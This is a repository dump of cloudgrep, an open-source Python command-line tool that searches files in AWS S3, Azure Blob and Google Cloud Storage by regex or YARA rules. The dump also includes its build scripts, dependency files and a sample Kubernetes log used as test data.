30 |     parser.add_argument("-f", "--filename", help="Filter objects whose names contain a keyword (e.g. .log.gz)")
31 |     parser.add_argument("-s", "--start_date", help="Filter objects modified after this date (YYYY-MM-DD)")
32 |     parser.add_argument("-e", "--end_date", help="Filter objects modified before this date (YYYY-MM-DD)")
33 |     parser.add_argument(
34 |         "-fs",
35 |         "--file_size",
36 |         type=int,
37 |         default=100_000_000,
38 |         help="Max file size in bytes (default: 100MB)",
39 |     )
40 |     parser.add_argument("-pr", "--profile", help="AWS profile to use (e.g. default, dev, prod)")
41 |     parser.add_argument("-d", "--debug", action="store_true", help="Enable debug logging")
42 |     parser.add_argument("-hf", "--hide_filenames", action="store_true", help="Hide filenames in output")
43 |     parser.add_argument("-lt", "--log_type", help="Pre-defined log type (e.g. cloudtrail, azure)")
44 |     parser.add_argument("-lf", "--log_format", help="Custom log format (e.g. json, csv)")
45 |     parser.add_argument(
46 |         "-lp", "--log_properties", type=list_of_strings, help="Comma-separated list of log properties to extract"
47 |     )
48 |     parser.add_argument("-jo", "--json_output", action="store_true", help="Output results in JSON format")
49 |     args = parser.parse_args()
50 | 
51 |     if len(sys.argv) == 1:
52 |         parser.print_help(sys.stderr)
53 |         sys.exit(1)
54 | 
55 |     # Parse dates (if provided) into datetime objects
56 |     start_date: Optional["datetime.datetime"] = dateutil.parser.parse(args.start_date) if args.start_date else None
57 |     end_date: Optional["datetime.datetime"] = dateutil.parser.parse(args.end_date) if args.end_date else None
58 | 
59 |     # Configure logging
60 |     if args.debug:
61 |         logging.basicConfig(format="[%(asctime)s] [%(levelname)s] %(message)s", level=logging.DEBUG)
62 |     else:
63 |         logging.basicConfig(format="[%(asctime)s] %(message)s", level=logging.WARNING)
64 |         logging.getLogger("urllib3.connectionpool").setLevel(logging.ERROR)
65 | 
66 |     CloudGrep().search(
67 |         bucket=args.bucket,
68 |         account_name=args.account_name,
69 |         container_name=args.container_name,
70 |         google_bucket=args.google_bucket,
71 |         query=args.query,
72 |         file=args.file,
73 |         yara_file=args.yara,
74 |         file_size=args.file_size,
75 |         prefix=args.prefix,
76 |         key_contains=args.filename,
77 |         from_date=start_date,
78 |         end_date=end_date,
79 |         hide_filenames=args.hide_filenames,
80 |         log_type=args.log_type,
81 |         log_format=args.log_format,
82 |         log_properties=args.log_properties,
83 |         profile=args.profile,
84 |         json_output=args.json_output,
85 |     )
86 | 
87 | 
88 | if __name__ == "__main__":
89 |     main()
90 | 


--------------------------------------------------------------------------------
/cloudgrep/cloud.py:
--------------------------------------------------------------------------------
  1 | import boto3
  2 | import os
  3 | from azure.storage.blob import BlobServiceClient
  4 | from azure.identity import DefaultAzureCredential
  5 | from azure.core.exceptions import ResourceNotFoundError
  6 | from google.cloud import storage  # type: ignore
  7 | from datetime import datetime
  8 | import botocore
  9 | import concurrent.futures
 10 | import tempfile
 11 | from typing import Iterator, Optional, List, Any, Tuple
 12 | import logging
 13 | from cloudgrep.search import Search
 14 | 
 15 | class Cloud:
 16 |     def __init__(self) -> None:
 17 |         self.search = Search()
 18 | 
 19 |     def _download_and_search_in_parallel(self, files: List[Any], worker_func: Any) -> int:
 20 |         """Use ThreadPoolExecutor to download every file
 21 |         Returns number of matched files"""
 22 |         total_matched = 0
 23 |         max_workers = 10 # limit cpu/memory pressure
 24 |         with concurrent.futures.ThreadPoolExecutor(max_workers=max_workers) as executor:
 25 |             for result in executor.map(worker_func, files):
 26 |                 total_matched += result
 27 |         return total_matched
 28 | 
 29 |     def _download_to_temp(self) -> str:
 30 |         """Return a temporary filename"""
 31 |         with tempfile.NamedTemporaryFile(delete=False) as tmp:
 32 |             tmp.close()
 33 |             return tmp.name
 34 | 
 35 |     def download_from_s3_multithread(
 36 |         self,
 37 |         bucket: str,
 38 |         files: List[str],
 39 |         query: List[str],
 40 |         hide_filenames: bool,
 41 |         yara_rules: Any,
 42 |         log_format: Optional[str] = None,
 43 |         log_properties: List[str] = [],
 44 |         json_output: Optional[bool] = False,
 45 |     ) -> int:
 46 |         """Download and search files from AWS S3"""
 47 |         if log_properties is None:
 48 |             log_properties = []
 49 |         s3 = boto3.client("s3", config=botocore.config.Config(max_pool_connections=64))
 50 | 
 51 |         def _download_search_s3(key: str) -> int:
 52 |             tmp_name = self._download_to_temp()
 53 |             try:
 54 |                 logging.info(f"Downloading s3://{bucket}/{key} to {tmp_name}")
 55 |                 s3.download_file(bucket, key, tmp_name)
 56 |                 matched = self.search.search_file(
 57 |                     tmp_name, key, query, hide_filenames, yara_rules, log_format, log_properties, json_output
 58 |                 )
 59 |                 return 1 if matched else 0
 60 |             except Exception:
 61 |                 logging.exception(f"Error processing {key}")
 62 |                 return 0
 63 |             finally:
 64 |                 try:
 65 |                     os.remove(tmp_name)
 66 |                 except OSError:
 67 |                     pass
 68 | 
 69 |         return self._download_and_search_in_parallel(files, _download_search_s3)
 70 | 
 71 |     def download_from_azure(
 72 |         self,
 73 |         account_name: str,
 74 |         container_name: str,
 75 |         files: List[str],
 76 |         query: List[str],
 77 |         hide_filenames: bool,
 78 |         yara_rules: Any,
 79 |         log_format: Optional[str] = None,
 80 |         log_properties: Optional[List[str]] = None,
 81 |         json_output: bool = False,
 82 |     ) -> int:
 83 |         """Download and search files from Azure Storage"""
 84 |         if log_properties is None:
 85 |             log_properties = []
 86 |         default_credential = DefaultAzureCredential()
 87 |         connection_str = f"DefaultEndpointsProtocol=https;AccountName={account_name};EndpointSuffix=core.windows.net"
 88 |         blob_service_client = BlobServiceClient.from_connection_string(connection_str, credential=default_credential)
 89 |         container_client = blob_service_client.get_container_client(container_name)
 90 | 
 91 |         def _download_search_azure(key: str) -> int:
 92 |             tmp_name = self._download_to_temp()
 93 |             try:
 94 |                 logging.info(f"Downloading azure://{account_name}/{container_name}/{key} to {tmp_name}")
 95 |                 blob_client = container_client.get_blob_client(key)
 96 |                 with open(tmp_name, "wb") as out_file:
 97 |                     stream = blob_client.download_blob()
 98 |                     stream.readinto(out_file)
 99 |                 matched = self.search.search_file(
100 |                     tmp_name,
101 |                     key,
102 |                     query,
103 |                     hide_filenames,
104 |                     yara_rules,
105 |                     log_format,
106 |                     log_properties,
107 |                     json_output,
108 |                     account_name,
109 |                 )
110 |                 return 1 if matched else 0
111 |             except ResourceNotFoundError:
112 |                 logging.info(f"File {key} not found in {account_name}/{container_name}")
113 |                 return 0
114 |             except Exception:
115 |                 logging.exception(f"Error processing {key}")
116 |                 return 0
117 |             finally:
118 |                 try:
119 |                     os.remove(tmp_name)
120 |                 except OSError:
121 |                     pass
122 | 
123 |         return self._download_and_search_in_parallel(files, _download_search_azure)
124 | 
125 |     def download_from_google(
126 |         self,
127 |         bucket: str,
128 |         blobs: List[Tuple[str, Any]],
129 |         query: List[str],
130 |         hide_filenames: bool,
131 |         yara_rules: Any,
132 |         log_format: Optional[str] = None,
133 |         log_properties: Optional[List[str]] = None,
134 |         json_output: bool = False,
135 |     ) -> int:
136 |         """Download and search files from Google Cloud Storage"""
137 |         if log_properties is None:
138 |             log_properties = []
139 | 
140 |         def _download_and_search_google(item: Tuple[str, Any]) -> int:
141 |             key, blob = item
142 |             tmp_name = self._download_to_temp()
143 |             try:
144 |                 logging.info(f"Downloading gs://{bucket}/{key} to {tmp_name}")
145 |                 blob.download_to_filename(tmp_name)
146 |                 matched = self.search.search_file(
147 |                     tmp_name, key, query, hide_filenames, yara_rules, log_format, log_properties, json_output
148 |                 )
149 |                 return 1 if matched else 0
150 |             except Exception:
151 |                 logging.exception(f"Error processing {key}")
152 |                 return 0
153 |             finally:
154 |                 try:
155 |                     os.remove(tmp_name)
156 |                 except OSError:
157 |                     pass
158 | 
159 |         return self._download_and_search_in_parallel(blobs, _download_and_search_google)
160 | 
161 |     def get_objects(
162 |         self,
163 |         bucket: str,
164 |         prefix: Optional[str],
165 |         key_contains: Optional[str],
166 |         from_date: Optional[datetime],
167 |         end_date: Optional[datetime],
168 |         file_size: int,
169 |         max_matches: int = 1000000 # generous default
170 |     ) -> Iterator[str]:
171 |         """Yield a maximum of max_matches objects that match filter"""
172 |         # Reuse the S3 client if already created; otherwise, create one
173 |         if not hasattr(self, "s3_client"):
174 |             self.s3_client = boto3.client("s3")
175 |         paginator = self.s3_client.get_paginator("list_objects_v2")
176 |         count = 0
177 |         for page in paginator.paginate(
178 |             Bucket=bucket,
179 |             Prefix=prefix,
180 |             PaginationConfig={'PageSize': 1000}
181 |         ):
182 |             for obj in page.get("Contents", []):
183 |                 if self.filter_object(obj, key_contains, from_date, end_date, file_size):
184 |                     yield obj.get("Key")
185 |                     count += 1
186 |                     if count >= max_matches:
187 |                         return
188 | 
189 |     def get_azure_objects(
190 |         self,
191 |         account_name: str,
192 |         container_name: str,
193 |         prefix: Optional[str],
194 |         key_contains: Optional[str],
195 |         from_date: Optional[datetime],
196 |         end_date: Optional[datetime],
197 |         file_size: int,
198 |     ) -> Iterator[str]:
199 |         """Yield Azure blob names that match the filter"""
200 |         default_credential = DefaultAzureCredential()
201 |         connection_str = f"DefaultEndpointsProtocol=https;AccountName={account_name};EndpointSuffix=core.windows.net"
202 |         blob_service_client = BlobServiceClient.from_connection_string(connection_str, credential=default_credential)
203 |         container_client = blob_service_client.get_container_client(container_name)
204 |         for blob in container_client.list_blobs(name_starts_with=prefix):
205 |             if self.filter_object_azure(blob, key_contains, from_date, end_date, file_size):
206 |                 yield blob.name
207 | 
208 |     def get_google_objects(
209 |         self,
210 |         bucket: str,
211 |         prefix: Optional[str],
212 |         key_contains: Optional[str],
213 |         from_date: Optional[datetime],
214 |         end_date: Optional[datetime],
215 |     ) -> Iterator[Tuple[str, Any]]:
216 |         """Yield (blob_name, blob) for blobs in GCP that match filter"""
217 |         client = storage.Client()
218 |         bucket_gcp = client.get_bucket(bucket)
219 |         for blob in bucket_gcp.list_blobs(prefix=prefix):
220 |             if self.filter_object_google(blob, key_contains, from_date, end_date):
221 |                 yield blob.name, blob
222 | 
223 |     def filter_object(
224 |         self,
225 |         obj: dict,
226 |         key_contains: Optional[str],
227 |         from_date: Optional[datetime],
228 |         to_date: Optional[datetime],
229 |         file_size: int,
230 |     ) -> bool:
231 |         """Filter an S3 object based on modification date, size, and key substring"""
232 |         last_modified = obj.get("LastModified")
233 |         if last_modified:
234 |             if from_date and last_modified < from_date:
235 |                 return False
236 |             if to_date and last_modified > to_date:
237 |                 return False
238 |         # If size is 0 or greater than file_size, skip
239 |         if int(obj.get("Size", 0)) == 0 or int(obj.get("Size", 0)) > file_size:
240 |             return False
241 |         if key_contains and key_contains not in obj.get("Key", ""):
242 |             return False
243 |         return True
244 | 
245 |     def filter_object_azure(
246 |         self,
247 |         obj: Any,
248 |         key_contains: Optional[str],
249 |         from_date: Optional[datetime],
250 |         to_date: Optional[datetime],
251 |         file_size: int,
252 |     ) -> bool:
253 |         """
254 |         Filter an Azure blob object (or dict) based on modification date, size, and name substring.
255 |         """
256 |         if isinstance(obj, dict):
257 |             last_modified = obj.get("last_modified")
258 |             size = int(obj.get("size", 0))
259 |             name = obj.get("name", "")
260 |         else:
261 |             last_modified = getattr(obj, "last_modified", None)
262 |             size = int(getattr(obj, "size", 0))
263 |             name = getattr(obj, "name", "")
264 |         if last_modified:
265 |             if from_date and last_modified < from_date:
266 |                 return False
267 |             if to_date and last_modified > to_date:
268 |                 return False
269 |         if size == 0 or size > file_size:
270 |             return False
271 |         if key_contains and key_contains not in name:
272 |             return False
273 |         return True
274 | 
275 |     def filter_object_google(
276 |         self,
277 |         obj: storage.blob.Blob,
278 |         key_contains: Optional[str],
279 |         from_date: Optional[datetime],
280 |         to_date: Optional[datetime],
281 |     ) -> bool:
282 |         """Filter a GCP blob based on update time and name substring"""
283 |         last_modified = getattr(obj, "updated", None)
284 |         if last_modified:
285 |             if from_date and last_modified < from_date:
286 |                 return False
287 |             if to_date and last_modified > to_date:
288 |                 return False
289 |         if key_contains and key_contains not in getattr(obj, "name", ""):
290 |             return False
291 |         return True
292 | 


--------------------------------------------------------------------------------
/cloudgrep/cloudgrep.py:
--------------------------------------------------------------------------------
  1 | import boto3
  2 | from datetime import datetime
  3 | from typing import Optional, List, Any, Dict
  4 | import logging
  5 | import yara  # type: ignore
  6 | 
  7 | from cloudgrep.cloud import Cloud
  8 | 
  9 | 
 10 | class CloudGrep:
 11 |     def __init__(self) -> None:
 12 |         self.cloud = Cloud()
 13 | 
 14 |     def load_queries(self, file_path: str) -> List[str]:
 15 |         with open(file_path, "r", encoding="utf-8") as f:
 16 |             return [line.strip() for line in f if line.strip()]
 17 | 
 18 |     def list_files(
 19 |         self,
 20 |         bucket: Optional[str],
 21 |         account_name: Optional[str],
 22 |         container_name: Optional[str],
 23 |         google_bucket: Optional[str],
 24 |         prefix: Optional[str] = "",
 25 |         key_contains: Optional[str] = None,
 26 |         from_date: Optional[datetime] = None,
 27 |         end_date: Optional[datetime] = None,
 28 |         file_size: int = 100_000_000, # 100MB
 29 |     ) -> Dict[str, List[Any]]:
 30 |         """
 31 |         Returns a dictionary of matching files for each cloud provider.
 32 | 
 33 |         The returned dict has the following keys:
 34 |           - "s3": a list of S3 object keys that match filters
 35 |           - "azure": a list of Azure blob names that match filters
 36 |           - "gcs": a list of tuples (blob name, blob) for Google Cloud Storage that match filters
 37 |         """
 38 |         files = {}
 39 |         if bucket:
 40 |             files["s3"] = list(self.cloud.get_objects(bucket, prefix, key_contains, from_date, end_date, file_size))
 41 |         if account_name and container_name:
 42 |             files["azure"] = list(
 43 |                 self.cloud.get_azure_objects(
 44 |                     account_name, container_name, prefix, key_contains, from_date, end_date, file_size
 45 |                 )
 46 |             )
 47 |         if google_bucket:
 48 |             files["gcs"] = [blob[0] for blob in self.cloud.get_google_objects(google_bucket, prefix, key_contains, from_date, end_date)]
 49 |         return files
 50 | 
 51 |     def search(
 52 |         self,
 53 |         bucket: Optional[str],
 54 |         account_name: Optional[str],
 55 |         container_name: Optional[str],
 56 |         google_bucket: Optional[str],
 57 |         query: Optional[List[str]],
 58 |         file: Optional[str],
 59 |         yara_file: Optional[str],
 60 |         file_size: int,
 61 |         prefix: Optional[str] = "",
 62 |         key_contains: Optional[str] = None,
 63 |         from_date: Optional[datetime] = None,
 64 |         end_date: Optional[datetime] = None,
 65 |         hide_filenames: bool = False,
 66 |         log_type: Optional[str] = None,
 67 |         log_format: Optional[str] = None,
 68 |         log_properties: Optional[List[str]] = None,
 69 |         profile: Optional[str] = None,
 70 |         json_output: bool = False,
 71 |         files: Optional[Dict[str, List[Any]]] = None,
 72 |     ) -> None:
 73 |         """
 74 |         Searches the contents of files matching the given queries.
 75 | 
 76 |         If the optional `files` parameter is provided (a dict with keys such as "s3", "azure", or "gcs")
 77 |         then the search will use those file lists instead of applying the filters again.
 78 |         """
 79 |         if not query and file:
 80 |             logging.debug(f"Loading queries from {file}")
 81 |             query = self.load_queries(file)
 82 |         if not query:
 83 |             logging.error("No query provided. Exiting.")
 84 |             return
 85 | 
 86 |         yara_rules = None
 87 |         if yara_file:
 88 |             logging.debug(f"Compiling yara rules from {yara_file}")
 89 |             yara_rules = yara.compile(filepath=yara_file)
 90 | 
 91 |         if profile:
 92 |             boto3.setup_default_session(profile_name=profile)
 93 | 
 94 |         if log_type:
 95 |             if log_type.lower() == "cloudtrail":
 96 |                 log_format = "json"
 97 |                 log_properties = ["Records"]
 98 |             elif log_type.lower() == "azure":
 99 |                 log_format = "json"
100 |                 log_properties = ["data"]
101 |             else:
102 |                 logging.error(f"Invalid log_type: {log_type}")
103 |                 return
104 |         if log_properties is None:
105 |             log_properties = []
106 | 
107 |         if bucket:
108 |             if files and "s3" in files:
109 |                 matching_keys = files["s3"]
110 |             else:
111 |                 matching_keys = list(
112 |                     self.cloud.get_objects(bucket, prefix, key_contains, from_date, end_date, file_size)
113 |                 )
114 |             s3_client = boto3.client("s3")
115 |             region = s3_client.get_bucket_location(Bucket=bucket).get("LocationConstraint", "unknown")
116 |             logging.warning(f"Bucket region: {region}. (Search from the same region to avoid egress charges.)")
117 |             logging.warning(f"Searching {len(matching_keys)} files in {bucket} for {query}...")
118 |             self.cloud.download_from_s3_multithread(
119 |                 bucket, matching_keys, query, hide_filenames, yara_rules, log_format, log_properties, json_output
120 |             )
121 | 
122 |         if account_name and container_name:
123 |             if files and "azure" in files:
124 |                 matching_keys = files["azure"]
125 |             else:
126 |                 matching_keys = list(
127 |                     self.cloud.get_azure_objects(
128 |                         account_name, container_name, prefix, key_contains, from_date, end_date, file_size
129 |                     )
130 |                 )
131 |             logging.info(f"Searching {len(matching_keys)} files in {account_name}/{container_name} for {query}...")
132 |             self.cloud.download_from_azure(
133 |                 account_name,
134 |                 container_name,
135 |                 matching_keys,
136 |                 query,
137 |                 hide_filenames,
138 |                 yara_rules,
139 |                 log_format,
140 |                 log_properties,
141 |                 json_output,
142 |             )
143 | 
144 |         if google_bucket:
145 |             if files and "gcs" in files:
146 |                 matching_blobs = files["gcs"]
147 |             else:
148 |                 matching_blobs = list(
149 |                     self.cloud.get_google_objects(google_bucket, prefix, key_contains, from_date, end_date)
150 |                 )
151 |             logging.info(f"Searching {len(matching_blobs)} files in {google_bucket} for {query}...")
152 |             self.cloud.download_from_google(
153 |                 google_bucket,
154 |                 matching_blobs,
155 |                 query,
156 |                 hide_filenames,
157 |                 yara_rules,
158 |                 log_format,
159 |                 log_properties,
160 |                 json_output,
161 |             )
162 | 


--------------------------------------------------------------------------------
/cloudgrep/queries.txt:
--------------------------------------------------------------------------------
1 | query1
2 | query2
3 | query3


--------------------------------------------------------------------------------
/cloudgrep/search.py:
--------------------------------------------------------------------------------
  1 | import re
  2 | from typing import Optional, List, Any, Iterator, Iterable
  3 | import logging
  4 | import gzip
  5 | import zipfile
  6 | import json
  7 | import csv
  8 | import io
  9 | 
 10 | class Search:
 11 |     def get_all_strings_line(self, file_path: str) -> Iterator[str]:
 12 |         """Yield lines from a file without loading into memory"""
 13 |         with open(file_path, "r", encoding="utf-8", errors="ignore") as f:
 14 |             for line in f:
 15 |                 yield line
 16 | 
 17 |     def print_match(self, match_info: dict, hide_filenames: bool, json_output: Optional[bool]) -> None:
 18 |         output = match_info.copy()
 19 |         if hide_filenames:
 20 |             output.pop("key_name", None)
 21 |         if json_output:
 22 |             try:
 23 |                 print(json.dumps(output))
 24 |             except TypeError:
 25 |                 print(str(output))
 26 |         else:
 27 |             line = output.get("line", "")
 28 |             if "match_rule" in output:
 29 |                 line = f"{output['match_rule']}: {output.get('match_strings', '')}"
 30 |             print(f"{output.get('key_name', '')}: {line}" if not hide_filenames else line)
 31 | 
 32 |     def parse_logs(self, line: str, log_format: Optional[str]) -> Any:
 33 |         if log_format == "json":
 34 |             try:
 35 |                 return json.loads(line)
 36 |             except json.JSONDecodeError as e:
 37 |                 logging.error(f"JSON decode error in line: {line} ({e})")
 38 |         elif log_format == "csv":
 39 |             try:
 40 |                 return list(csv.DictReader([line]))
 41 |             except csv.Error as e:
 42 |                 logging.error(f"CSV parse error in line: {line} ({e})")
 43 |         elif log_format:
 44 |             logging.error(f"Unsupported log format: {log_format}")
 45 |         return None
 46 | 
 47 |     def extract_log_entries(self, parsed: Any, log_properties: List[str]) -> List[Any]:
 48 |         if log_properties and isinstance(parsed, dict):
 49 |             for prop in log_properties:
 50 |                 parsed = parsed.get(prop, None)
 51 |                 if parsed is None:
 52 |                     break
 53 |         if isinstance(parsed, list):
 54 |             return parsed
 55 |         elif parsed is not None:
 56 |             return [parsed]
 57 |         return []
 58 | 
 59 |     def search_logs(
 60 |         self,
 61 |         line: str,
 62 |         key_name: str,
 63 |         search: str,
 64 |         hide_filenames: bool,
 65 |         log_format: Optional[str] = None,
 66 |         log_properties: List[str] = [],
 67 |         json_output: Optional[bool] = False,
 68 |     ) -> None:
 69 |         """Search log records in parsed logs"""
 70 |         parsed = self.parse_logs(line, log_format)
 71 |         if not parsed:
 72 |             return
 73 |         for entry in self.extract_log_entries(parsed, log_properties):
 74 |             entry_str = json.dumps(entry)
 75 |             if re.search(search, entry_str):
 76 |                 self.print_match({"key_name": key_name, "query": search, "line": entry}, hide_filenames, json_output)
 77 | 
 78 |     def search_line(
 79 |         self,
 80 |         key_name: str,
 81 |         compiled_patterns: List[re.Pattern],
 82 |         hide_filenames: bool,
 83 |         line: str,
 84 |         log_format: Optional[str],
 85 |         log_properties: List[str] = [],
 86 |         json_output: Optional[bool] = False,
 87 |     ) -> bool:
 88 |         """Regex search of the line"""
 89 |         found = False
 90 |         for regex in compiled_patterns:
 91 |             if regex.search(line):
 92 |                 if log_format:
 93 |                     self.search_logs(line, key_name, regex.pattern, hide_filenames, log_format, log_properties, json_output)
 94 |                 else:
 95 |                     self.print_match(
 96 |                         {"key_name": key_name, "query": regex.pattern, "line": line}, hide_filenames, json_output
 97 |                     )
 98 |                 found = True
 99 |         return found
100 | 
101 |     def yara_scan_file(
102 |         self, file_name: str, key_name: str, hide_filenames: bool, yara_rules: Any, json_output: Optional[bool] = False
103 |     ) -> bool:
104 |         """Run Yara scan on a file"""
105 |         matches = yara_rules.match(file_name)
106 |         for match in matches:
107 |             self.print_match(
108 |                 {"key_name": key_name, "match_rule": match.rule, "match_strings": match.strings},
109 |                 hide_filenames,
110 |                 json_output,
111 |             )
112 |         return bool(matches)
113 | 
114 |     def search_file(
115 |         self,
116 |         file_name: str,
117 |         key_name: str,
118 |         patterns: List[str],
119 |         hide_filenames: bool,
120 |         yara_rules: Any,
121 |         log_format: Optional[str] = None,
122 |         log_properties: List[str] = [],
123 |         json_output: Optional[bool] = False,
124 |         account_name: Optional[str] = None,
125 |     ) -> bool:
126 |         """Regex search of the file line by line"""
127 |         logging.info(f"Searching {file_name} for patterns: {patterns}")
128 |         if yara_rules:
129 |             return self.yara_scan_file(file_name, key_name, hide_filenames, yara_rules, json_output)
130 |         
131 |         compiled_patterns = [re.compile(p) for p in patterns]
132 | 
133 |         def process_lines(lines: Iterable[str]) -> bool:
134 |             return any(
135 |                 self.search_line(key_name, compiled_patterns, hide_filenames, line, log_format, log_properties, json_output)
136 |                 for line in lines
137 |             )
138 | 
139 |         if file_name.endswith(".gz"):
140 |             try:
141 |                 with gzip.open(file_name, "rt", encoding="utf-8", errors="ignore") as f:
142 |                     if account_name:
143 |                         data = json.load(f)
144 |                         return process_lines(data)
145 |                     else:
146 |                         return process_lines(f)
147 |             except Exception:
148 |                 logging.exception(f"Error processing gzip file: {file_name}")
149 |                 return False
150 |         elif file_name.endswith(".zip"):
151 |             matched_any = False
152 |             try:
153 |                 with zipfile.ZipFile(file_name, "r") as zf:
154 |                     for zip_info in zf.infolist():
155 |                         if zip_info.is_dir():
156 |                             continue
157 |                         with zf.open(zip_info) as file_obj:
158 |                             # Wrap the binary stream as text
159 |                             with io.TextIOWrapper(file_obj, encoding="utf-8", errors="ignore") as f:
160 |                                 if account_name:
161 |                                     try:
162 |                                         data = json.load(f)
163 |                                         if process_lines(data):
164 |                                             matched_any = True
165 |                                     except Exception:
166 |                                         logging.exception(f"Error processing json in zip member: {zip_info.filename}")
167 |                                 else:
168 |                                     if process_lines(f):
169 |                                         matched_any = True
170 |                 return matched_any
171 |             except Exception:
172 |                 logging.exception(f"Error processing zip file: {file_name}")
173 |                 return False
174 |         else:
175 |             try:
176 |                 return process_lines(self.get_all_strings_line(file_name))
177 |             except Exception:
178 |                 logging.exception(f"Error processing file: {file_name}")
179 |                 return False
180 | 


--------------------------------------------------------------------------------
/readme/Diagram.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cado-security/cloudgrep/7f22e3a4f7131d6ecc7693197a2cd78186147278/readme/Diagram.png


--------------------------------------------------------------------------------
/release/generate_linux_binary.sh:
--------------------------------------------------------------------------------
1 | # Run with ./release/generate_linux_binary.sh
2 | pwd
3 | ls
4 | pip3 install -r requirements.txt
5 | pyinstaller  --onefile --name cloudgrep --clean ./cloudgrep/__main__.py
6 | 


--------------------------------------------------------------------------------
/release/generate_osx_binary.sh:
--------------------------------------------------------------------------------
1 | # Tested with python 3.10 and PyInstaller 5.4.1
2 | # Run with ./release/generate_linux_binary.sh
3 | pwd
4 | ls
5 | pip3 install -r requirements.txt
6 | pyinstaller  --onefile --clean --target-arch universal2 ./cloudgrep/cloudgrep.py
7 | 


--------------------------------------------------------------------------------
/release/generate_windows_binary.bat:
--------------------------------------------------------------------------------
1 | dir
2 | python3 -m pip install -r ../requirements.txt
3 | python3 -m PyInstaller --name cloudgrep --onefile ../cloudgrep/__main__.py
4 | 


--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
 1 | botocore>=1.36.9
 2 | boto3>=1.36.9
 3 | boto3-stubs>=1.36.9
 4 | python-dateutil==2.8.1
 5 | types-python-dateutil==2.8.13
 6 | pytest==7.2.0
 7 | moto==5.0.27
 8 | timeout-decorator==0.5.0
 9 | black==24.3.0
10 | pip-audit==2.6.1
11 | azure-storage-blob==12.18.3
12 | azure-core==1.29.4
13 | azure-identity==1.16.1
14 | google-cloud-storage==2.12.0
15 | setuptools==70.0.0
16 | yara-python-wheel==4.4.0
17 | 


--------------------------------------------------------------------------------
/setup.cfg:
--------------------------------------------------------------------------------
 1 | [metadata]
 2 | name = cloudgrep
 3 | description = cloudgrep: searches cloud storage.
 4 | version = 1.0.5
 5 | long_description = file: README.md
 6 | long_description_content_type = text/x-rst
 7 | author = Cado Security and Contributors
 8 | license = Apache License
 9 | license_files = LICENSE
10 | classifiers =
11 |     Intended Audience :: Developers
12 |     Operating System :: POSIX
13 |     Programming Language :: Python :: 3
14 |     Programming Language :: Python :: 3 :: Only
15 |     Programming Language :: Python :: 3.8
16 |     Programming Language :: Python :: 3.9
17 |     Programming Language :: Python :: 3.10
18 |     Programming Language :: Python :: 3.11
19 |     Programming Language :: Python :: 3.12
20 |     Topic :: Software Development :: Libraries
21 |     Topic :: Utilities
22 | 
23 | [options]
24 | packages =
25 |     cloudgrep
26 | install_requires =
27 |     botocore==1.24.46
28 |     boto3==1.21.24
29 |     boto3-stubs==1.20.49
30 |     python-dateutil==2.8.1
31 |     types-python-dateutil==2.8.13
32 |     pytest==7.2.0
33 |     moto==4.2.2
34 |     timeout-decorator==0.5.0
35 |     black==23.9.1
36 |     pip-audit==2.6.1
37 |     azure-storage-blob==12.18.3
38 |     azure-core==1.29.4
39 |     azure-identity==1.14.1
40 |     google-cloud-storage==2.12.0
41 | python_requires = >=3.8
42 | zip_safe = ye
43 | 
44 | [options.entry_points]
45 | console_scripts =
46 |     cloudgrep=cloudgrep.__main__:main
47 | 
48 | [options.extras_require]
49 | testing =
50 |     pytest==7.2.0
51 | 
52 | 
53 | [devpi:upload]
54 | formats = sdist.tgz,bdist_wheel
55 | 


--------------------------------------------------------------------------------
/setup.py:
--------------------------------------------------------------------------------
 1 | # read the contents of your README file
 2 | from pathlib import Path
 3 | 
 4 | from setuptools import find_packages, setup  # type: ignore
 5 | 
 6 | this_directory = Path(__file__).parent
 7 | long_description = (this_directory / "README.md").read_text()
 8 | 
 9 | 
10 | VERSION = "1.0.5"
11 | 
12 | setup(
13 |     name="cloudgrep",
14 |     version=VERSION,
15 |     description="cloudgrep searches cloud storage",
16 |     long_description=long_description,
17 |     long_description_content_type="text/markdown",
18 |     author="Cado Security",
19 |     author_email="cloudgrep@cadosecurity.com",
20 |     url="https://github.com/cado-security/cloudgrep",
21 |     download_url="https://github.com/cado-security/cloudgrep/archive/refs/heads/main.zip",
22 |     py_modules=["cloudgrep"],
23 |     install_requires=[
24 |         "botocore",
25 |         "boto3",
26 |         "python-dateutil",
27 |         "azure-storage-blob",
28 |         "azure-core",
29 |         "azure-identity",
30 |         "google-cloud-storage",
31 |         "yara-python-wheel",
32 |     ],
33 |     packages=find_packages(),
34 | )
35 | 


--------------------------------------------------------------------------------
/tests/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cado-security/cloudgrep/7f22e3a4f7131d6ecc7693197a2cd78186147278/tests/__init__.py


--------------------------------------------------------------------------------
/tests/data/000000:
--------------------------------------------------------------------------------
  1 | 2021-07-10T20:27:23.000Z I0710 20:27:23.782909       1 flags.go:59] FLAG: --add-dir-header="false"
  2 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783038       1 flags.go:59] FLAG: --address="127.0.0.1"
  3 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783055       1 flags.go:59] FLAG: --allocate-node-cidrs="false"
  4 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783062       1 flags.go:59] FLAG: --allow-untagged-cloud="false"
  5 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783066       1 flags.go:59] FLAG: --alsologtostderr="false"
  6 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783070       1 flags.go:59] FLAG: --attach-detach-reconcile-sync-period="1m0s"
  7 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783075       1 flags.go:59] FLAG: --authentication-kubeconfig=""
  8 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783080       1 flags.go:59] FLAG: --authentication-skip-lookup="false"
  9 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783084       1 flags.go:59] FLAG: --authentication-token-webhook-cache-ttl="10s"
 10 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783087       1 flags.go:59] FLAG: --authentication-tolerate-lookup-failure="false"
 11 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783091       1 flags.go:59] FLAG: --authorization-always-allow-paths="[/healthz]"
 12 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783104       1 flags.go:59] FLAG: --authorization-kubeconfig=""
 13 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783108       1 flags.go:59] FLAG: --authorization-webhook-cache-authorized-ttl="10s"
